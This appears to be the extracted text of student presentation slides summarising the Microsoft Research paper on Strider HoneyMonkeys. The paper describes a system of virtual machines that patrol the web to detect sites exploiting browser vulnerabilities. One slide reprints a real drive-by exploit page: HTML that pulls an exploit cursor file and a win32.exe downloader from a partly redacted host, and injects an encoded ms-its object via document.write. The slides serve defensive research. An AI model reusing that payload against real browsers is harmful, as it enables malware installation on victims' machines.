Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities

AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev,Chad Verbowski, Shuo Chen, and Sam King

PUBLISHED IN: MICROSOFT RESEARCH ,Redmond

EMERGING ATTACK : INTERNET ATTACKS BY MALICIOUS WEBSITE

EXPLOIT BROWSER VULNERABILITIES

INSTALL MALICIOUS CONTENTS

USE OF HONEYMONKEYS FOR SOLUTION

PROPOSED PROBLEM

BROWSER BASED VULNERABILITY

Code Obfuscation

URL redirection

Vulnerability exploitation

Malware installation

CODE OBFUSCATION

CODE OBFUSCATION

• To escape from signature based scanning• Custom decoding routine included inside

the script• Unreadable long strings that are

encoded and decoded later by the script or by the browser

ENCODED MALICIOUS CODE

DECODED MALICIOUS CODE

URL REDIRECTION

URL REDIRECTION

• PRIMARY URL TO SECONDARY URL • PROTOCOL REDIRECTION USING HTTP

302 TEMPORARY REDIRECT• HTML TAGS • Script functions including window.location.replace().

URL REDIRECTION

PRIMARY SECONDARY

USER

http://[IP address]/[8 chars]/test2/iejp.htmhttp://[IP address]

VULNERABILITY EXPLOITATION

VULNERABILITY EXPLOITATION

• Malicious Website attempt to exploit multiple vulnerabilities

• HTML fragment – multiple files from different URL’S

• Dynamic code injection using Document.write• Trojan downloader works after exploits• Most attacked browser is IE

EXAMPLE FOR VULNERABILITY

<html><head><title></title></head><body><style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>

<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>Try{document.write('<objectdata=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;//

C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){}</script></body></html>

Exploit 1

Exploit 2

Exploit 3

Honey Monkey Exploit Detection System

• Active client side virtual machines called honeypots

• Large scale, systematic and automated web patrol

• It mimics human browsing• Different patches and different levels of

vulnerability

HONEYMONKEY SYSTEM

• Stage 1 – scalable mode by visiting N-URLs.

• Stage 2 – perform recursive redirected analysis.

• Stage 3 – scan exploit URLs using fully patched VMs.

HONEY MONKEY SYSTEM

TOPOLOGY GRAPH AND NODE RANKING

• Rectangular nodes represent Exploit URL’s

• Arrows represent traffic redirection• Circles represent nodes that act as an

aggregation point for exploit pages hosted

• R is the most likely exploit provider

TOPOLOGY GRAPH AND NODE RANKING

GENERATING URL LISTS

• Generating URL LISTS - Suspicious URL’s - Popular websites – if attacked potentially attack larger population - Localized space websites

Exploit Detection Report

• Executable files created or modified outside the browser sandbox folders

• Processes created • Windows registry entry created or

modified• Vulnerability exploited• Redirect URL visited

Patch level statistics

RESULTS

ADVANTAGES

• Automatic• Scalable• Non-signature based approach• Stage-wise detection

DISADVANTGES

• Exploiters may randomize the attack confusing the honey monkeys

• Exploiters were able to detect honey monkeys by sending dialog box

• They didn’t explain about topology graphs very clearly

IMPROVEMENTS

They need to work on accuracy

They need more classification according to contents

They should improve on avoiding detection by the honey monkeys